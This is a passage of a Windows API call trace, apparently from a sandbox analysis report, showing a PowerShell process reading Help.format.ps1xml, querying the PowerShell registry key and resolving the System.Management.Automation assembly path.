lpAddress=0x19d230, lpBuffer=0x19e230, dwLength=0x1c | out: lpBuffer=0x19e230*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.350] VirtualQuery (in: lpAddress=0x19d230, lpBuffer=0x19e230, dwLength=0x1c | out: lpBuffer=0x19e230*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0050.350] GetLastError () returned 0x0 [0050.350] SetErrorMode (uMode=0x1) returned 0x1 [0050.350] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0050.350] GetLastError () returned 0x0 [0050.350] GetFileType (hFile=0x328) returned 0x1 [0050.351] SetErrorMode (uMode=0x1) returned 0x1 [0050.351] GetFileType (hFile=0x328) returned 0x1 [0050.351] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.352] GetLastError () returned 0x0 [0050.354] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.354] GetLastError () returned 0x0 [0050.355] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.355] GetLastError () returned 0x0 [0050.355] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.355] GetLastError () returned 0x0 [0050.355] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.356] GetLastError () returned 0x0 [0050.356] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.356] GetLastError () returned 0x0 [0050.356] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.356] GetLastError () returned 0x0 [0050.356] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.356] GetLastError () returned 0x0 [0050.357] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.357] GetLastError () returned 0x0 [0050.357] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.357] GetLastError () returned 0x0 [0050.357] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.357] GetLastError () returned 0x0 [0050.358] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.358] GetLastError () returned 0x0 [0050.358] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.358] GetLastError () returned 0x0 [0050.358] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.358] GetLastError () returned 0x0 [0050.358] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.360] GetLastError () returned 0x0 [0050.361] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.361] GetLastError () returned 0x0 [0050.363] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.363] GetLastError () returned 0x0 [0050.363] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.364] GetLastError () returned 0x0 [0050.364] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.364] GetLastError () returned 0x0 [0050.364] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.364] GetLastError () returned 0x0 [0050.364] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.364] GetLastError () returned 0x0 [0050.364] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.364] GetLastError () returned 0x0 [0050.364] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.364] GetLastError () returned 0x0 [0050.365] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.365] GetLastError () returned 0x0 [0050.365] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.365] GetLastError () returned 0x0 [0050.365] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.365] GetLastError () returned 0x0 [0050.365] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.365] GetLastError () returned 0x0 [0050.365] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.365] GetLastError () returned 0x0 [0050.366] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.366] GetLastError () returned 0x0 [0050.366] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.366] GetLastError () returned 0x0 [0050.366] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.366] GetLastError () returned 0x0 [0050.366] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.366] GetLastError () returned 0x0 [0050.370] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.370] GetLastError () returned 0x0 [0050.370] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.370] GetLastError () returned 0x0 [0050.370] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.371] GetLastError () returned 0x0 [0050.371] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.371] GetLastError () returned 0x0 [0050.371] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.371] GetLastError () returned 0x0 [0050.371] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.371] GetLastError () returned 0x0 [0050.371] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.371] GetLastError () returned 0x0 [0050.371] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.372] GetLastError () returned 0x0 [0050.372] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.372] GetLastError () returned 0x0 [0050.372] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.372] GetLastError () returned 0x0 [0050.372] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.372] GetLastError () returned 0x0 [0050.372] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.372] GetLastError () returned 0x0 [0050.372] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.373] GetLastError () returned 0x0 [0050.373] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.373] GetLastError () returned 0x0 [0050.373] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.373] GetLastError () returned 0x0 [0050.373] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.373] GetLastError () returned 0x0 [0050.373] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.373] GetLastError () returned 0x0 [0050.373] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.373] GetLastError () returned 0x0 [0050.374] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.374] GetLastError () returned 0x0 [0050.374] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.374] GetLastError () returned 0x0 [0050.374] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.374] GetLastError () returned 0x0 [0050.374] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.374] GetLastError () returned 0x0 [0050.374] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.374] GetLastError () returned 0x0 [0050.375] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.375] GetLastError () returned 0x0 [0050.375] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.375] GetLastError () returned 0x0 [0050.375] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.375] GetLastError () returned 0x0 [0050.375] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.375] GetLastError () returned 0x0 [0050.375] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.375] GetLastError () returned 0x0 [0050.376] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.376] GetLastError () returned 0x0 [0050.376] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.376] GetLastError () returned 0x0 [0050.376] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0xf37, lpOverlapped=0x0) returned 1 [0050.376] GetLastError () returned 0x0 [0050.376] ReadFile (in: hFile=0x328, lpBuffer=0x309027f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x309027f*, lpNumberOfBytesRead=0x19e504*=0x0, lpOverlapped=0x0) returned 1 [0050.376] GetLastError () returned 0x0 [0050.376] ReadFile (in: hFile=0x328, lpBuffer=0x3090ba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x3090ba8*, lpNumberOfBytesRead=0x19e504*=0x0, lpOverlapped=0x0) returned 1 [0050.376] GetLastError () returned 0x0 [0050.376] CloseHandle (hObject=0x328) returned 1 [0050.376] GetLastError () returned 0x0 [0050.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0050.377] GetLastError () returned 0x0 [0050.377] SetErrorMode (uMode=0x1) returned 0x1 [0050.377] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x30b1ba4 | out: lpFileInformation=0x30b1ba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0050.377] GetLastError () returned 0x0 [0050.377] SetErrorMode (uMode=0x1) returned 0x1 [0050.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0050.377] GetLastError () returned 0x0 [0050.377] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e488 | out: phkResult=0x19e488*=0x328) returned 0x0 [0050.377] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e4d0, lpData=0x0, lpcbData=0x19e4cc*=0x0 | out: lpType=0x19e4d0*=0x1, lpData=0x0, lpcbData=0x19e4cc*=0x56) returned 0x0 [0050.377] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e4d0, lpData=0x247300, lpcbData=0x19e4cc*=0x56 | out: lpType=0x19e4d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x19e4cc*=0x56) returned 0x0 [0050.378] RegCloseKey (hKey=0x328) returned 0x0 [0050.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0050.378] GetLastError () returned 0x0 [0050.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19dfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0050.378] GetLastError () returned 0x0 [0050.389] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x297144da, Data2=0x1cac, Data3=0x4a89, Data4=([0]=0x83, [1]=0x4c, [2]=0xde, [3]=0x9c, [4]=0x2e, [5]=0x36, [6]=0xf2, [7]=0xa))) returned 0x0 [0050.389] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xf4132534, Data2=0x6ac5, Data3=0x4dae, Data4=([0]=0x9b, [1]=0xea, [2]=0x37, [3]=0x3b, [4]=0x2f, [5]=0x3, [6]=0x40, [7]=0xc))) returned 0x0 [0050.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.389] GetLastError () returned 0x0 [0050.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.389] GetLastError () returned 0x0 [0050.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.389] GetLastError () returned 0x0 [0050.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.389] GetLastError () returned 0x0 [0050.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.421] GetLastError () returned 0x0 [0050.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: 